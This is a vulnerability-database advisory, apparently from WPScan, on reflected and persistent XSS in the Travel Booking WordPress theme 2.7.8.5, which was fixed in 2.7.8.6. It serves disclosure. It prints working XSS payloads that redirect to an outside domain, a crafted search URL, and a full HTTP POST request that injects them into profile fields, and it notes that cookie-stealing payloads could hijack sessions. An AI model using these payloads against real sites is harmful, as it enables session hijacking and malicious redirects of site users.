Themes Vulnerabilities
Travel Booking < 2.7.8.6 - Reflected & Persistent XSS Issues
Description
Reflected & Persistent XSS vulnerability was discovered in the 'Travel Booking WordPress Theme', tested version — v2.7.8.5
Edit (WPScanTeam):
January 11th, 2020 - Report received & Envato contacted
January 12th, 2020 - Report updated with Reflected XSS, Envato notified again.
January 12th, 2020 - Envato investigating
January 13th, 2020 - 2.7.8.6 released, fixing the issues
Proof of Concept
# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Reflected & Persistent XSS # Google Dork: /wp-content/themes/traveler/ # Date: 11/01/2020 # Exploit Author: m0ze # Vendor Homepage: https://travelerwp.com/ # Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683 # Version: 2.7.8.5 # Tested on: Kali Linux # CVE: - # CWE: 79 ----[]- Info: -[]---- Demo website: https://mixmap.travelerwp.com/ PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/ ----[]- Reflected XSS: -[]---- Payload Sample: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: https://mixmap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;%3E ----[]- Persistent XSS -> User Profile: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Paypal Email», «Phone Number» and «Home Airport». Vulnerable textarea: «About Yourself». Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /page-user-setting/?sc=setting&id_user HTTP/1.1 Host: mixmap.travelerwp.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------191691572411478 Content-Length: 2210 Origin: https://mixmap.travelerwp.com Connection: close Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user Cookie: _your_cookies_here_ Upgrade-Insecure-Requests: 1 -----------------------------191691572411478 Content-Disposition: form-data; name="st_update_user" ba1d73a992 -----------------------------191691572411478 Content-Disposition: form-data; name="_wp_http_referer" /page-user-setting/?sc=setting&id_user -----------------------------191691572411478 Content-Disposition: form-data; name="id_user" 1672 -----------------------------191691572411478 Content-Disposition: form-data; name="st_paypal_email" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_email" asdasd@asdasd.com -----------------------------191691572411478 Content-Disposition: form-data; name="st_phone" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_bio" </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_is_check_show_info" on -----------------------------191691572411478 Content-Disposition: form-data; name="id_avatar" 10928 -----------------------------191691572411478 Content-Disposition: form-data; name="st_avatar"; filename="" Content-Type: application/octet-stream -----------------------------191691572411478 Content-Disposition: form-data; name="st_airport" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_province" -----------------------------191691572411478 Content-Disposition: form-data; name="st_address" -----------------------------191691572411478 Content-Disposition: form-data; name="st_zip_code" -----------------------------191691572411478 Content-Disposition: form-data; name="st_city" -----------------------------191691572411478 Content-Disposition: form-data; name="st_country" -----------------------------191691572411478 Content-Disposition: form-data; name="st_btn_update" Save Changes -----------------------------191691572411478--
Affects Themes
Fixed in 2.7.8.6
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-01-13 (about 4 years ago)
Added
2020-01-14 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)